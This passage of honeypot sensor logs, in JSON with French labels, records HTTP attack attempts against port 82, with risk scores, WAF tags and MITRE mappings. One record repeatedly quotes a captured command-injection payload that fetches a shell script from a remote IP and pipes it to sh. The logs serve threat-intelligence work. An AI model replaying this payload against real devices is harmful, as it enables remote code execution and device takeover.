\u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/api\/network\/settings\u0022, \u0022request_line\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/api\/network\/settings\u0022, \u0022evidence_snippet\u0022: \u0022POST \/api\/network\/settings HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 166\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_cmd_injection\u0022, \u0022http_idor_probe\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_cmd_injection\u0022, \u0022http_idor_probe\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":315},{"id":11809359,"ip":"45.153.34.219","ts":"2026-07-14 02:18:14.000000","proto":"tcp","src_port":55272,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":66,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/JNAP\/","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00221590bac5c7d7e8540ab87881f47e89fa381ce665\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 440, \u0022payload_entropy\u0022: 5.3835072102643755, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002226d01c6ce6b37139b843d323b1ef2a95e8528a97\u0022, \u0022event_fingerprint\u0022: \u002246be7d8f39f80a261149ebffcf4c1aeb91d4c093\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022a16e6852ef4637d08decbc46aa15d9f8\u0022, \u0022path_pattern_hash\u0022: \u002209d793525e81db3cecc4e36c738b6310\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/firmware\/Upgrade\\r\\nContent-Length: 251\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/firmware\/Upgrade\\\u0022,\\\u0022comma\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/firmware\/Upgrade\\r\\nContent-Length: 251\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/firmware\/Upgrade\\\u0022,\\\u0022comma\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022a52f75d655f34e84442d9d8ef8d4678262c22911\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 10 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":440},{"id":11809360,"ip":"45.153.34.219","ts":"2026-07-14 02:18:14.000000","proto":"tcp","src_port":55284,"dst_port":82,"service":"http","classification":"lfi_path_traversal","waf_score":41,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00225e0ad868dd3c13dd4457bba7c1746b5834f6cce3\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 283, \u0022payload_entropy\u0022: 5.1024015862661445, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 59, \u0022tag_count\u0022: 8, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022c7d8fa39615febdd2729fcb2c8999c370253c185\u0022, \u0022event_fingerprint\u0022: \u0022afecc2c3982695981719e6ab722e74d60464daf2\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 59}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022cb4dd6c58421edff9380d424d7657c65\u0022, \u0022path_pattern_hash\u0022: \u00226aff1c054e67a6e0a068c48726213b60\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 59}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo\u0022, \u0022query_string\u0022: \u0022action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo\u0022, \u0022query_string\u0022: \u0022action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo HTTP\/1.1\\r\\nHost: 62.3.50.3\u0022, \u0022payload_snippet\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, 